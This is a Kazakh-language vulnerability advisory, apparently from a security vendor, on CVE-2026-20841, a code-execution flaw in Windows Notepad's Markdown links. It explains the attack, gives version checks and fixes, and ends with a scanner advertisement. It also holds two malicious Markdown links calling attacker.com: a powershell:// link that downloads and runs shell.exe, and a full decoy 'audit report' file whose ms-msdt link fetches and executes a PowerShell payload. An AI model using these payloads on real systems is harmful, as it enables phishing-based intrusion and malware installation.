CVE Analysis21 ақпан 20265 мин оқу

CVE-2026-20841: Windows Notepad RCE — Markdown Exploit

Windows Notepad-тағы жаңа Markdown қолдауында маңызды осалдық. Арнайы .md файл сілтемені басқанда код орындауға мүмкіндік береді.

Қысқаша

Заманауи Windows Notepad-та RCE (Microsoft Store нұсқасы)
Зиянды Markdown сілтемелері басқанда command injection тудырады
CVSS 8.8 — пайдаланушы әрекеті қажет, бірақ exploit оңай
Түзету: Notepad-ты Microsoft Store арқылы 11.2510+ нұсқасына жаңарту

CVE-2026-20841 дегеніміз не?

Заманауи Windows Notepad-тағы remote code execution осалдығы. Жаңа Markdown rendering engine гиперсілтемелердегі URI схемаларын тазартпайды. .md файлдағы арнайы сілтемені бассаңыз — Notepad оны тікелей жүйелік shell-ге жібереді.

 Attack Chain — CVE-2026-20841

📧

Email with .md file

📝

Victim opens in Notepad

🔗

Clicks crafted link

⚡

URI → System Shell

💀

Code Execution

Қалай жұмыс істейді

Заманауи Notepad Markdown парсерлейді — bold, header, link. Шабуылшылар скриптке нұсқайтын custom protocol scheme бар сілтеме енгізеді. Notepad URI-ды validate жасамай, ОС protocol handler-ге жібереді — payload орындалады.

 Notepad — report.md (Preview)

Q4 Security Audit Report

Status: COMPLETE | Classification: Internal

All systems passed baseline security checks. Click below to view the full interactive report.

🔗 View Full Report →

Generated by SecurityBot v4.2 | Do not forward

# Қалыпты Markdown сілтеме:
[Басу](https://example.com)

# Зиянды сілтеме — command injection тудырады:
[Есепті ашу](powershell://command=Invoke-WebRequest%20-Uri%20http://attacker.com/shell.exe%20-OutFile%20C:/temp/shell.exe;Start-Process%20C:/temp/shell.exe)

# Не болады:
# 1. Қолданушы зиянды .md файлды Notepad-та ашады
# 2. Кәдімгі "Есепті ашу" сілтемесін көреді
# 3. Басады → PowerShell payload жүктеп орындайды

Осал екеніңізді тексеріңіз

Notepad нұсқаңызды тексеріңіз. Microsoft Store-дан және 11.2510-нан төмен болса — осалсыз.

# PowerShell арқылы нұсқаны тексеру
Get-AppxPackage *Notepad* | Select-Object Name, Version

# Егер Version < 11.2510.0.0 → ОСАЛ
# Классикалық notepad.exe-ге ӘСЕР ЕТПЕЙДІ

Тек Microsoft Store нұсқасы осал. Классикалық notepad.exe қауіпсіз.

Exploit — Толық тізбек

Шабуылшы .md файлды email арқылы жібереді. Қолданушы ашады, кәсіби құжатты көреді, сілтемені басады — бәрі аяқталды.

cat > report.md << 'EOF'
# Q4 Қауіпсіздік Аудит Есебі

Мәртебесі: **АЯҚТАЛДЫ** | Жіктемесі: Ішкі

## Қорытынды
Барлық жүйелер базалық тексерістен өтті.

[Толық есепті ашу](ms-msdt:/id PCWDiagnostic /skip force /param "IT_RBrowseForFile=$(IEX(IWR -Uri http://attacker.com/payload.ps1))")

---
*SecurityBot v4.2 жасаған*
EOF

# Қолданушы ашады → басады → PowerShell payload орындайды

Түзету

Дереу жаңартыңыз. Жаңарта алмасаңыз — бұғаттаңыз.

# Notepad жаңарту
winget upgrade "Windows Notepad"

# Немесе .md файлдарды legacy notepad-қа байлау
assoc .md=txtfile
ftype txtfile=C:\Windows\System32\notepad.exe %1

11.2510+ нұсқасына жаңартыңыз. Мүмкін болмаса — .md файлдарды классикалық notepad.exe-де ашыңыз.

TEPTEZ-бен сканерлеңіз. Бұл қауіпті шабуылшылардан бұрын табыңыз.

TEPTEZ endpoint-тарды осал қолданба нұсқалары, жаңартылмаған бағдарламалар және exploit жасалатын конфигурацияларға сканерлейді. Біздің DAST AI қызметін қараңыз — сканерлейді, табады және түзетуді ұсынады.

TEPTEZ қолданып көру